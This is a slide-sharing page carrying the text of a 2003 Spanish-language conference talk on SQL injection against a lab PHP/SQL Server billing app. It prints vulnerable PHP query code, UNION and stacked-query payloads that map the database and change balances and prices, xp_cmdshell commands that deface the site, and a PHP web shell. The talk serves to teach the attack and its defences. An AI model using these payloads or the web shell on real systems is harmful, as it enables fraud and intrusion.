Enviar búsqueda
Cargar
Exploiting Web applications SQL Injection
•
0 recomendaciones
•
708 vistas
Conferencias FIST
Seguir
Tecnología
Denunciar
Compartir
Denunciar
Compartir
1 de 25
Descargar ahora
Descargar para leer sin conexión
Recomendados
Charla OWASP
Charla OWASP
alexav8
Servicios web
Servicios web
Joel Balderrama Rosas
Prepared statement
Prepared statement
Erlin Darwin Herrera cieza
Manual
Manual
vicosw
Vulnerabilidades en aplicaciones web
Vulnerabilidades en aplicaciones web
RealTIC
Principales vulnerabilidades en Aplicaciones Web - Rediris 2008
Principales vulnerabilidades en Aplicaciones Web - Rediris 2008
Christian Martorella
Servicios web
Servicios web
Joel Balderrama Rosas
Malware_Popayan-securinf.com
Malware_Popayan-securinf.com
Securinf.com Seguridad Informatica - Tecnoweb2.com
Más contenido relacionado
Destacado
Evaluation of DDoS attacks generated on mobile devices and their effect on th...
Evaluation of DDoS attacks generated on mobile devices and their effect on th...
Andres Almeida
Sql injection
Sql injection
Minoxx
Rsa
Rsa
yaya
114986362 ddos
114986362 ddos
Guadalupe Del Rosario D.
RSA
RSA
olivermartz
Seguridad sql injection
Seguridad sql injection
Gary Briceño
Sql Injection
Sql Injection
Leonardo Raygoza
Viii congreso isaca 2015 grc
Viii congreso isaca 2015 grc
balejandre
Comparacion entre my sql y sql server
Comparacion entre my sql y sql server
Jorge Luis Tinoco
Ransomware
Ransomware
Nick Miller
CIFRADO RSA
CIFRADO RSA
rul05
Las 5 fuerzas de michael porter
Las 5 fuerzas de michael porter
Mack Vázquez
How to Take the Ransom Out of Ransomware
How to Take the Ransom Out of Ransomware
marketingunitrends
Achieving high-fidelity security
Achieving high-fidelity security
balejandre
Sql server 2008
Sql server 2008
brobelo
Ransomware
Ransomware
Akshita Pillai
5 fuerzas de Porter
5 fuerzas de Porter
Valeska Marin
5 fuerzas de porter
5 fuerzas de porter
Jesus Sanchez
Diapositivas las 5 fuerzas de porter.
Diapositivas las 5 fuerzas de porter.
Espoch
Modelo de las 5 fuerzas de porter
Modelo de las 5 fuerzas de porter
marielberenice
Destacado
(20)
Evaluation of DDoS attacks generated on mobile devices and their effect on th...
Evaluation of DDoS attacks generated on mobile devices and their effect on th...
Sql injection
Sql injection
Rsa
Rsa
114986362 ddos
114986362 ddos
RSA
RSA
Seguridad sql injection
Seguridad sql injection
Sql Injection
Sql Injection
Viii congreso isaca 2015 grc
Viii congreso isaca 2015 grc
Comparacion entre my sql y sql server
Comparacion entre my sql y sql server
Ransomware
Ransomware
CIFRADO RSA
CIFRADO RSA
Las 5 fuerzas de michael porter
Las 5 fuerzas de michael porter
How to Take the Ransom Out of Ransomware
How to Take the Ransom Out of Ransomware
Achieving high-fidelity security
Achieving high-fidelity security
Sql server 2008
Sql server 2008
Ransomware
Ransomware
5 fuerzas de Porter
5 fuerzas de Porter
5 fuerzas de porter
5 fuerzas de porter
Diapositivas las 5 fuerzas de porter.
Diapositivas las 5 fuerzas de porter.
Modelo de las 5 fuerzas de porter
Modelo de las 5 fuerzas de porter
Similar a Exploiting Web applications SQL Injection
Examen ISC
Examen ISC
ivan mtz
Aplicaciones para sistemas distribuidos slide
Aplicaciones para sistemas distribuidos slide
marieuri
Presentación Workshop php Barcelona Seguridad
Presentación Workshop php Barcelona Seguridad
guestbfa74a
STRUTS (MVC e Java)
STRUTS (MVC e Java)
ousli07
Seguridad En Programación
Seguridad En Programación
vladimir calderon
Sql injection
Sql injection
Mauro Gomez Mejia
PHP Y MYSQL
PHP Y MYSQL
Edgar Pauta
Actividad No. 1.11: SQL Injection con sqlmap en Kali Linux
Actividad No. 1.11: SQL Injection con sqlmap en Kali Linux
Francisco Medina
Taller Manejo De Tablas Sql01
Taller Manejo De Tablas Sql01
Edgar Sandoval
Curso php dia4
Curso php dia4
cognos_uie
Seguridad Base de Datos sql injection v1.0
Seguridad Base de Datos sql injection v1.0
José Moreno
Replicacion de base de datos
Replicacion de base de datos
tickyandres
Exploiting Web Applications XSS
Exploiting Web Applications XSS
Conferencias FIST
Mysql Seguridad Replicacion
Mysql Seguridad Replicacion
christian nieto
Practica 8
Practica 8
Jose Cordova
Curso migración de aplicaciones nsl nk90 a tmp
Curso migración de aplicaciones nsl nk90 a tmp
Edgar Solis
bdlink vistas materializadas
bdlink vistas materializadas
Juan Calvache
Pl 08-aplicacion-en-php-my sql
Pl 08-aplicacion-en-php-my sql
Noé Arpasi
Evidencia Informe amenaza a las bases de datos - Gestión de la Seguridad Info...
Evidencia Informe amenaza a las bases de datos - Gestión de la Seguridad Info...
Jesús Daniel Mayo
Inyecciones sql para todos
Inyecciones sql para todos
csaralg
Similar a Exploiting Web applications SQL Injection
(20)
Examen ISC
Examen ISC
Aplicaciones para sistemas distribuidos slide
Aplicaciones para sistemas distribuidos slide
Presentación Workshop php Barcelona Seguridad
Presentación Workshop php Barcelona Seguridad
STRUTS (MVC e Java)
STRUTS (MVC e Java)
Seguridad En Programación
Seguridad En Programación
Sql injection
Sql injection
PHP Y MYSQL
PHP Y MYSQL
Actividad No. 1.11: SQL Injection con sqlmap en Kali Linux
Actividad No. 1.11: SQL Injection con sqlmap en Kali Linux
Taller Manejo De Tablas Sql01
Taller Manejo De Tablas Sql01
Curso php dia4
Curso php dia4
Seguridad Base de Datos sql injection v1.0
Seguridad Base de Datos sql injection v1.0
Replicacion de base de datos
Replicacion de base de datos
Exploiting Web Applications XSS
Exploiting Web Applications XSS
Mysql Seguridad Replicacion
Mysql Seguridad Replicacion
Practica 8
Practica 8
Curso migración de aplicaciones nsl nk90 a tmp
Curso migración de aplicaciones nsl nk90 a tmp
bdlink vistas materializadas
bdlink vistas materializadas
Pl 08-aplicacion-en-php-my sql
Pl 08-aplicacion-en-php-my sql
Evidencia Informe amenaza a las bases de datos - Gestión de la Seguridad Info...
Evidencia Informe amenaza a las bases de datos - Gestión de la Seguridad Info...
Inyecciones sql para todos
Inyecciones sql para todos
Más de Conferencias FIST
Seguridad en Open Solaris
Seguridad en Open Solaris
Conferencias FIST
Seguridad en Entornos Web Open Source
Seguridad en Entornos Web Open Source
Conferencias FIST
Spanish Honeynet Project
Spanish Honeynet Project
Conferencias FIST
Seguridad en Windows Mobile
Seguridad en Windows Mobile
Conferencias FIST
SAP Security
SAP Security
Conferencias FIST
Que es Seguridad
Que es Seguridad
Conferencias FIST
Network Access Protection
Network Access Protection
Conferencias FIST
Las Evidencias Digitales en la Informática Forense
Las Evidencias Digitales en la Informática Forense
Conferencias FIST
Evolución y situación actual de la seguridad en redes WiFi
Evolución y situación actual de la seguridad en redes WiFi
Conferencias FIST
El Information Security Forum
El Information Security Forum
Conferencias FIST
Criptografia Cuántica
Criptografia Cuántica
Conferencias FIST
Inseguridad en Redes Wireless
Inseguridad en Redes Wireless
Conferencias FIST
Mas allá de la Concienciación
Mas allá de la Concienciación
Conferencias FIST
Security Metrics
Security Metrics
Conferencias FIST
PKI Interoperability
PKI Interoperability
Conferencias FIST
Wifislax 3.1
Wifislax 3.1
Conferencias FIST
Network Forensics
Network Forensics
Conferencias FIST
Riesgo y Vulnerabilidades en el Desarrollo
Riesgo y Vulnerabilidades en el Desarrollo
Conferencias FIST
Demostracion Hacking Honeypot y Análisis Forense
Demostracion Hacking Honeypot y Análisis Forense
Conferencias FIST
Security Maturity Model
Security Maturity Model
Conferencias FIST
Más de Conferencias FIST
(20)
Seguridad en Open Solaris
Seguridad en Open Solaris
Seguridad en Entornos Web Open Source
Seguridad en Entornos Web Open Source
Spanish Honeynet Project
Spanish Honeynet Project
Seguridad en Windows Mobile
Seguridad en Windows Mobile
SAP Security
SAP Security
Que es Seguridad
Que es Seguridad
Network Access Protection
Network Access Protection
Las Evidencias Digitales en la Informática Forense
Las Evidencias Digitales en la Informática Forense
Evolución y situación actual de la seguridad en redes WiFi
Evolución y situación actual de la seguridad en redes WiFi
El Information Security Forum
El Information Security Forum
Criptografia Cuántica
Criptografia Cuántica
Inseguridad en Redes Wireless
Inseguridad en Redes Wireless
Mas allá de la Concienciación
Mas allá de la Concienciación
Security Metrics
Security Metrics
PKI Interoperability
PKI Interoperability
Wifislax 3.1
Wifislax 3.1
Network Forensics
Network Forensics
Riesgo y Vulnerabilidades en el Desarrollo
Riesgo y Vulnerabilidades en el Desarrollo
Demostracion Hacking Honeypot y Análisis Forense
Demostracion Hacking Honeypot y Análisis Forense
Security Maturity Model
Security Maturity Model
Último
La tablet trabajo en grupo del grado 9-2
La tablet trabajo en grupo del grado 9-2
montoyagabriela340
Presentación - Diseño de Algoritmos Paralelos - Grupo 2.pdf
Presentación - Diseño de Algoritmos Paralelos - Grupo 2.pdf
ymiranda2
DESARROLLO BLOG Y ANÁLISIS DE ARTEFACTOS
DESARROLLO BLOG Y ANÁLISIS DE ARTEFACTOS
reinamanuela20
taller de la electricidad y electrónica
taller de la electricidad y electrónica
ErickAlegria3
Inteligencia artificial dentro de la contabilidad
Inteligencia artificial dentro de la contabilidad
danik1023m
PRESENTACION DEL TEMA LOS MEJORES SIMULADORES DE CIRCUITOS ELCTRONICOS
PRESENTACION DEL TEMA LOS MEJORES SIMULADORES DE CIRCUITOS ELCTRONICOS
LincangoKevin
DESARROLLO DE BLOG DE ANÁLISIS Y ARTEFACTOS TECNOLOGICOS
DESARROLLO DE BLOG DE ANÁLISIS Y ARTEFACTOS TECNOLOGICOS
reinamanuela20
Actividad 1-PRESENTACIÓN ANIMADA.pptxPreservación y conservación de los docum...
Actividad 1-PRESENTACIÓN ANIMADA.pptxPreservación y conservación de los docum...
OLGAMILENAMONTAEZNIO
TENDENCIAS DE IA Explorando el futuro de la tecnologia.pdf
TENDENCIAS DE IA Explorando el futuro de la tecnologia.pdf
JoseAlejandroPerezBa
¡Cookiegeddon! Bye a las cookies de terceros y cómo afectará a tu software
¡Cookiegeddon! Bye a las cookies de terceros y cómo afectará a tu software
Francisco Javier Barrena
Actividad 14_ Diseño de Algoritmos Paralelos.pdf
Actividad 14_ Diseño de Algoritmos Paralelos.pdf
alejandrogomezescoto
Taller de tecnología conclucion tonotoss
Taller de tecnología conclucion tonotoss
gijhonpa
La Electricidad y La Electrónica por el grado 10-5
La Electricidad y La Electrónica por el grado 10-5
CamilaCordoba30
Tecnológia 2024.docx.Tecnológia 2024.docx.
Tecnológia 2024.docx.Tecnológia 2024.docx.
marianarodriguezc797
Matriz de integración de tecnologías- Paola Carvajal.docx
Matriz de integración de tecnologías- Paola Carvajal.docx
PaolaCarolinaCarvaja
BEDEC Proyecto y obra , novedades 2024 - Xavier Folch
BEDEC Proyecto y obra , novedades 2024 - Xavier Folch
ITeC Instituto Tecnología Construcción
Actividad 14: Diseño de Algoritmos Paralelos Actividad 14: Diseño de Algoritm...
Actividad 14: Diseño de Algoritmos Paralelos Actividad 14: Diseño de Algoritm...
RaymondCode
BEDEC Sostenibilidad, novedades 2024 - Laura Silva
BEDEC Sostenibilidad, novedades 2024 - Laura Silva
ITeC Instituto Tecnología Construcción
PPT de introducción a la unidad 1 de 5 Basico.pptx
PPT de introducción a la unidad 1 de 5 Basico.pptx
ProfeVivianaRS
El diseño de Algoritmos Paralelos.pdf - analisis de algortimos
El diseño de Algoritmos Paralelos.pdf - analisis de algortimos
LCristinaForchue
Último
(20)
La tablet trabajo en grupo del grado 9-2
La tablet trabajo en grupo del grado 9-2
Presentación - Diseño de Algoritmos Paralelos - Grupo 2.pdf
Presentación - Diseño de Algoritmos Paralelos - Grupo 2.pdf
DESARROLLO BLOG Y ANÁLISIS DE ARTEFACTOS
DESARROLLO BLOG Y ANÁLISIS DE ARTEFACTOS
taller de la electricidad y electrónica
taller de la electricidad y electrónica
Inteligencia artificial dentro de la contabilidad
Inteligencia artificial dentro de la contabilidad
PRESENTACION DEL TEMA LOS MEJORES SIMULADORES DE CIRCUITOS ELCTRONICOS
PRESENTACION DEL TEMA LOS MEJORES SIMULADORES DE CIRCUITOS ELCTRONICOS
DESARROLLO DE BLOG DE ANÁLISIS Y ARTEFACTOS TECNOLOGICOS
DESARROLLO DE BLOG DE ANÁLISIS Y ARTEFACTOS TECNOLOGICOS
Actividad 1-PRESENTACIÓN ANIMADA.pptxPreservación y conservación de los docum...
Actividad 1-PRESENTACIÓN ANIMADA.pptxPreservación y conservación de los docum...
TENDENCIAS DE IA Explorando el futuro de la tecnologia.pdf
TENDENCIAS DE IA Explorando el futuro de la tecnologia.pdf
¡Cookiegeddon! Bye a las cookies de terceros y cómo afectará a tu software
¡Cookiegeddon! Bye a las cookies de terceros y cómo afectará a tu software
Actividad 14_ Diseño de Algoritmos Paralelos.pdf
Actividad 14_ Diseño de Algoritmos Paralelos.pdf
Taller de tecnología conclucion tonotoss
Taller de tecnología conclucion tonotoss
La Electricidad y La Electrónica por el grado 10-5
La Electricidad y La Electrónica por el grado 10-5
Tecnológia 2024.docx.Tecnológia 2024.docx.
Tecnológia 2024.docx.Tecnológia 2024.docx.
Matriz de integración de tecnologías- Paola Carvajal.docx
Matriz de integración de tecnologías- Paola Carvajal.docx
BEDEC Proyecto y obra , novedades 2024 - Xavier Folch
BEDEC Proyecto y obra , novedades 2024 - Xavier Folch
Actividad 14: Diseño de Algoritmos Paralelos Actividad 14: Diseño de Algoritm...
Actividad 14: Diseño de Algoritmos Paralelos Actividad 14: Diseño de Algoritm...
BEDEC Sostenibilidad, novedades 2024 - Laura Silva
BEDEC Sostenibilidad, novedades 2024 - Laura Silva
PPT de introducción a la unidad 1 de 5 Basico.pptx
PPT de introducción a la unidad 1 de 5 Basico.pptx
El diseño de Algoritmos Paralelos.pdf - analisis de algortimos
El diseño de Algoritmos Paralelos.pdf - analisis de algortimos
Exploiting Web applications SQL Injection
1.
FIST Conference October
2003 @ SQL Injection © Rafael San Miguel Carrasco
2.
SQL Injection
Escenario: Windows 2000 Professional Apache Win32 1.3.28 PHP 4.3.3 SQL Server 2000 Documentos HTML y scripts PHP © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 2
3.
SQL Injection
Operadora de móviles, servicios online: consulta de saldo contratación de teleservicios A través de un identificador secreto asignado a cada cliente, que se utiliza para consultar información y como medio de pago. © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 3
4.
SQL Injection
Estructura tabla “clientes”: © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 4
5.
SQL Injection
Estructura tabla “servicios”: © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 5
6.
SQL Injection
Página principal: © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 6
7.
SQL Injection
Consulta de saldo legítima: © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 7
8.
SQL Injection
Contratación de un servicio: © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 8
9.
SQL Injection
consultasaldo.php: $query = "SELECT nombre, apellidos, saldo FROM clientes WHERE id='$idcliente';"; $result = mssql_query ($query); $nfilas = mssql_num_rows ($result); while ($row = mssql_fetch_array ($result) ) { echo "Nombre del cliente: <b>" . $row[0] . " " . $row[1] . "</b><br>"; echo "Saldo actual: <b>" . $row[2] . "</b>"; } © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 9
10.
SQL Injection
contratar.php: $query = "SELECT * FROM servicios WHERE id='$idservicio';"; $result = mssql_query ($query); $row = mssql_fetch_array ($result); $precio = $row [3]; echo "El precio del servicio que desea contratar es de <b>$precio</b> euros<br>"; $saldo_final = $saldo_actual - $precio; $query = "UPDATE clientes SET saldo=$saldo_final WHERE id='$idcliente';"; mssql_query ($query); $query = "UPDATE clientes SET servicio" . $idservicio. "=1 WHERE id= '$idcliente';"; mssql_query ($query); © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 10
11.
SQL Injection
Mapear la base de datos: tablas que componen la base de datos listado y tipo de las columnas de cada tabla © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 11
12.
SQL Injection
5' AND 1=0 union select TABLE_NAME from INFORMATION_SCHEMA.TABLES— Warning: mssql_query(): message: Todas las consultas de una instruccion SQL que contenga un operador UNION deben tener el mismo numero de expresiones en sus listas de destino. (severity 16) in c:apachehtdocsconsultasaldo.php on line 21 5‘ AND 1=0 union select TABLE_NAME," ",1 from INFORMATION_SCHEMA.TABLES-- © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 12
13.
SQL Injection © Rafael
San Miguel Carrasco, rsmc@soluciones-seguras.com 13
14.
SQL Injection
5‘ AND 1=0 union select TABLE_NAME, COLUMN_NAME,1 from INFORMATION_SCHEMA.COLUMNS © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 14
15.
SQL Injection
5‘ AND 1=0 union select TABLE_NAME, COLUMN_NAME,type from syscolumns, INFORMATION_SCHEMA.COLUMNS— © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 15
16.
SQL Injection
5‘ AND 1=0; update clientes set saldo=500000 where id=5555-- © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 16
17.
SQL Injection
5556'; update servicios set precio=1 where nombre_servicio= "llamada en espera"— © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 17
18.
SQL Injection
Warning: mssql_query(): message: Linea 1: sintaxis incorrecta cerca de '—'. (severity 15) in c:apachehtdocscontratar.php on line 22 Warning: mssql_query(): message: Comilla no cerrada antes de la cadena de caracteres ';'. (severity 15) in c:apachehtdocscontratar.php on line 22 © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 18
19.
SQL Injection
5‘ AND 1=0; exec master..xp_cmdshell 'echo "<html> <body><img src=http://www.geocities.com/clan_de_vampiros/Caminante.gif> <br>hacked </body></html>" > c:apachehtdocsdeface.htm'— 5556’; exec master..xp_cmdshell ‘copy c:apachehtdocsdeface.htm c:apachehtdocsprincipal.htm’— © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 19
20.
SQL Injection © Rafael
San Miguel Carrasco, rsmc@soluciones-seguras.com 20
21.
SQL Injection
shell.php: <html> <body><?php $comando = $_GET["comando"]; echo "$comando<br>"; $resultado = system ($comando); echo $resultado; ?> </body> </html> O también: passthru () © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 21
22.
SQL Injection
5556'; exec master..xp_cmdshell 'echo "<html><body> <?php $comando=$_GET["comando"];echo $comando; $resultado = system ($comando);echo $resultado;?> </body></html>" > c:apachehtdocsshell.php'-- http://127.0.0.1/shell.php?comando=dir.. © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 22
23.
SQL Injection
http://127.0.0.1/shell.php?comando=type c:odbc.conf © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 23
24.
SQL Injection
En php.ini: ; Magic quotes for incoming ; GET/POST/Cookie data. magic_quotes_gpc = On / Off Sin embargo, con campos numéricos esta protección es inútil © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 24
25.
SQL Injection FIST Conference
October 2003 © Rafael San Miguel Carrasco Madrid, 25 October 2003
Notas del editor
Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
Descargar ahora